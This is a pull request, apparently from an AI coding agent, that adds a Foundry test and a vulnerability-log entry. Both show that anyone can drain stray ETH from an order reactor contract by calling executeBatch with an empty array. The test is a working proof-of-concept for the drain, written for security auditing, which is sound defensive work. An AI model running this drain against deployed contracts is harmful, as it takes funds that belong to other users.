### PR TITLE
Add empty batch ETH drain test

### DIFF
--- a/TestedVectors.md
+++ b/TestedVectors.md
@@ -122,3 +122,7 @@ We tested whether invoking `OrderQuoter.quote` with a fully signed order could t
 - **Description**: The reactor refunds any ETH balance to the filler after execution. If the filler contract refuses ETH, this refund reverts and halts order execution. An attacker can send ETH to the reactor to block such fillers.
 - **Test**: `EthOutputNoReceiveTest.testRefundToNonPayableReverts` deploys a `MockFillContractNoReceive` without a payable fallback. After sending stray ETH to the reactor, executing an order reverts with `NativeTransferFailed`.
 - **Result**: **Bug discovered** – leftover ETH can be used to grief non-payable fillers.
+## Leftover ETH Drain via Empty Batch
+- **Description**: Anyone can reclaim stray ETH by calling `executeBatch` with an empty array, causing the reactor to refund its entire balance to the caller.
+- **Test**: `EthOutputTest.testEmptyBatchRefundsLeftoverEth` sends ETH to the reactor then executes an empty batch, receiving the deposit back.
+- **Result**: **Bug discovered** – reactor exposes a simple ETH drain even without valid orders.

--- a/test/base/EthOutput.t.sol
+++ b/test/base/EthOutput.t.sol
@@ -473,4 +473,22 @@ contract EthOutputDirectFillerTest is Test, PermitSignature, DeployPermit2 {
         assertEq(directFiller.balance, ONE);
         assertEq(address(reactor).balance, 0);
     }
+
+    /// @dev Draining stray ETH via empty executeBatch
+    function testEmptyBatchRefundsLeftoverEth() public {
+        // Deposit 1 ether to the reactor from an unrelated address
+        address stranger = address(9999);
+        vm.deal(stranger, ONE);
+        vm.prank(stranger);
+        address(reactor).call{value: ONE}("");
+
+        // Execute an empty batch to claim the stray ETH
+        SignedOrder[] memory orders = new SignedOrder[](0);
+        address filler = address(1111);
+        vm.prank(filler);
+        reactor.executeBatch(orders);
+
+        assertEq(filler.balance, ONE);
+        assertEq(address(reactor).balance, 0);
+    }
 }


### PR DESCRIPTION
## Summary
- add test covering draining ETH via empty executeBatch
- document the new attack vector in TestedVectors.md

## Testing
- `forge test --match-test testEmptyBatchRefundsLeftoverEth -vvv`

------
https://chatgpt.com/codex/tasks/task_e_688ace2dc1c0832d989b5c8f41269a93